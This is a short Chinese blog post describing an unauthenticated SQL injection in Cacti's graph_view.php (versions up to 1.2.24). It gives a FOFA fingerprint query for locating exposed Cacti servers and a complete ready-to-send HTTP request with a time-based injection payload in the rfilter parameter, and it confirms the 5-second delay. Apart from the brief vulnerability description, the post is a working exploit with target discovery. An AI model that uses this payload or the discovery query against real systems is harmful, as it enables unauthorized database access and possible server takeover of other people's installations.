Babing
Published on 2024-08-30 / 1 Visits
0
0

C7-1Cacti-SQL

C7-1Cacti-SQL

漏洞描述:

该漏洞存在于graph_view.php文件中。默认情况下,访客用户无需身份验证即可访问graph_view.php,在启用情况下使用时会导致SQL注入漏洞。
image-20240619173752058攻击者可能利用此漏洞执行远程代码或篡夺管理权限。Growth_right_pane_tree函数包含从graph_view.php文件调用的漏洞。在tree_content情况下,用户输入通过html_validate_tree_vars函数进行验证。如果tree_id参数大于0,则调用grow_right_pane_tree函数。

影响版本:

Cacti <= 1.2.24  

网站图片:

image-20240620200906251

网络测绘:

fofa语法:

FOFA:icon_hash=“-1797138069”

漏洞复现:

payload:

GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3d%22%28%28%22%29%29%3bselect+sleep%285%29%3b--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

效果图:
延时5秒


Comment